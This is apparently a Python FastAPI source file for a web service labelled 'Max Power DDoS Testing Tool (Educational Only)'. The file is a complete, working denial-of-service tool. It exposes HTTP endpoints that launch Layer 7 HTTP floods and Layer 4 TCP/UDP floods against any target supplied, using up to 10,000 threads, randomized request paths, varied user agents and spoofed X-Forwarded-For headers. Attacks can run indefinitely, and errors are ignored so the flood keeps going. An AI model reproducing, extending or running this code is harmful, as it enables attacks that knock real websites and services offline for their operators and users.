dstat / main.py
rkihacker's picture
Update main.py
a00e94e verified
raw
history blame
8.56 kB
# main.py
import uvicorn
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel, conint, constr
import threading
import requests
import time
import logging
import socket
import random
import ssl
from concurrent.futures import ThreadPoolExecutor
from urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings for Layer 7 attacks
disable_warnings(InsecureRequestWarning)
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
app = FastAPI(title="Max Power DDoS Testing Tool (Educational Only)")
# Global attack control
attack_active = False
attack_thread = None
executor = ThreadPoolExecutor(max_workers=10000) # Maximum threads
# Connection pool for Layer 7 attacks
session = requests.Session()
session.mount('http://', requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000))
session.mount('https://', requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000))
class Layer7Config(BaseModel):
target: str
port: int = 80
duration: int = 30 # -1 for unlimited
threads: int = 10000 # Default to max threads
keep_alive: bool = True
method: constr(regex='^(GET|POST|HEAD|PUT|DELETE)$') = "GET"
payload_size: int = 0 # For POST requests
class Layer4Config(BaseModel):
target: str
port: int = 80
duration: int = 30 # -1 for unlimited
threads: int = 10000 # Default to max threads
protocol: constr(regex='^(tcp|udp)$') = "tcp"
payload_size: int = 1024
connection_rate: int = 1000 # Connections per second
def generate_payload(size: int) -> bytes:
"""Generate random payload for Layer 4 attacks"""
return bytes(random.getrandbits(8) for _ in range(size))
def generate_random_path():
"""Generate random URL path for Layer 7 attacks"""
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
return '/' + ''.join(random.choice(chars) for _ in range(random.randint(5, 15)))
def generate_random_headers():
"""Generate random headers for Layer 7 attacks"""
user_agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)",
"Mozilla/5.0 (X11; Linux x86_64)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X)",
"Mozilla/5.0 (iPad; CPU OS 15_0 like Mac OS X)"
]
accept_types = [
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"application/json,text/plain,*/*",
"image/webp,image/apng,image/*,*/*;q=0.8"
]
return {
"User-Agent": random.choice(user_agents),
"Accept": random.choice(accept_types),
"Accept-Language": "en-US,en;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive" if random.random() > 0.3 else "close",
"Cache-Control": "no-cache",
"Pragma": "no-cache",
"DNT": "1",
"Upgrade-Insecure-Requests": "1",
"X-Forwarded-For": f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}"
}
def layer7_attack(target_url: str, config: Layer7Config):
global attack_active
# Prepare request data
path = generate_random_path()
headers = generate_random_headers()
if config.method == "POST":
data = generate_payload(config.payload_size)
else:
data = None
while attack_active:
try:
session.request(
method=config.method,
url=f"{target_url}{path}",
headers=headers,
data=data,
timeout=5,
verify=False
)
except:
pass # Ignore errors to keep flooding
def layer4_attack(target_ip: str, port: int, protocol: str, payload_size: int):
global attack_active
while attack_active:
sock = None
try:
if protocol == "tcp":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(5)
sock.connect((target_ip, port))
while attack_active:
payload = generate_payload(payload_size)
sock.send(payload)
time.sleep(0.001) # Very fast sending
else: # udp
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while attack_active:
payload = generate_payload(payload_size)
sock.sendto(payload, (target_ip, port))
time.sleep(0.001) # Very fast sending
except:
pass # Ignore errors to keep flooding
finally:
if sock:
sock.close()
def start_layer7_attack(config: Layer7Config):
global attack_active
attack_active = True
# Build target URL
protocol = "https" if config.target.startswith("https") else "http"
target_url = f"{config.target}:{config.port}"
logger.info(f"Starting Layer 7 attack on {target_url} with {config.threads} threads")
# Start attack threads
for _ in range(config.threads):
executor.submit(layer7_attack, target_url, config)
# Handle duration
if config.duration != -1:
time.sleep(config.duration)
stop_attack()
else:
logger.info("Layer 7 attack running indefinitely until manually stopped")
def start_layer4_attack(config: Layer4Config):
global attack_active
attack_active = True
# Extract IP from target URL
try:
target_ip = socket.gethostbyname(config.target.split("//")[-1].split("/")[0])
except:
raise HTTPException(status_code=400, detail="Invalid target URL")
logger.info(f"Starting {config.protocol.upper()} attack on {target_ip}:{config.port} with {config.threads} threads")
# Start attack threads
for _ in range(config.threads):
executor.submit(layer4_attack, target_ip, config.port, config.protocol, config.payload_size)
# Handle duration
if config.duration != -1:
time.sleep(config.duration)
stop_attack()
else:
logger.info(f"{config.protocol.upper()} attack running indefinitely until manually stopped")
def stop_attack():
global attack_active
attack_active = False
logger.info("Attack stopped.")
@app.post("/layer7/attack")
def launch_layer7_attack(config: Layer7Config):
global attack_thread
if attack_thread and attack_thread.is_alive():
raise HTTPException(status_code=400, detail="Attack already in progress")
# Validate thread count
if config.threads > 10000:
raise HTTPException(status_code=400, detail="Max 10,000 threads allowed")
# Validate duration
if config.duration > 5000:
raise HTTPException(status_code=400, detail="Max duration 5000 seconds")
# Validate payload size
if config.payload_size > 65507:
raise HTTPException(status_code=400, detail="Max payload size is 65507 bytes")
attack_thread = threading.Thread(target=start_layer7_attack, args=(config,), daemon=True)
attack_thread.start()
return {"status": "layer7_attack_started", "config": config}
@app.post("/layer4/attack")
def launch_layer4_attack(config: Layer4Config):
global attack_thread
if attack_thread and attack_thread.is_alive():
raise HTTPException(status_code=400, detail="Attack already in progress")
# Validate thread count
if config.threads > 10000:
raise HTTPException(status_code=400, detail="Max 10,000 threads allowed")
# Validate duration
if config.duration > 5000:
raise HTTPException(status_code=400, detail="Max duration 5000 seconds")
# Validate payload size
if config.payload_size > 65507:
raise HTTPException(status_code=400, detail="Max payload size is 65507 bytes")
attack_thread = threading.Thread(target=start_layer4_attack, args=(config,), daemon=True)
attack_thread.start()
return {"status": f"{config.protocol}_attack_started", "config": config}
@app.post("/stop")
def stop():
stop_attack()
return {"status": "attack_stopped"}
@app.get("/status")
def status():
return {"attack_active": attack_active}
if __name__ == "__main__":
uvicorn.run(
app,
host="0.0.0.0",
port=8000,
workers=2, # Match your 2vCPU
limit_concurrency=10000,
limit_max_requests=10000,
timeout_keep_alive=5
)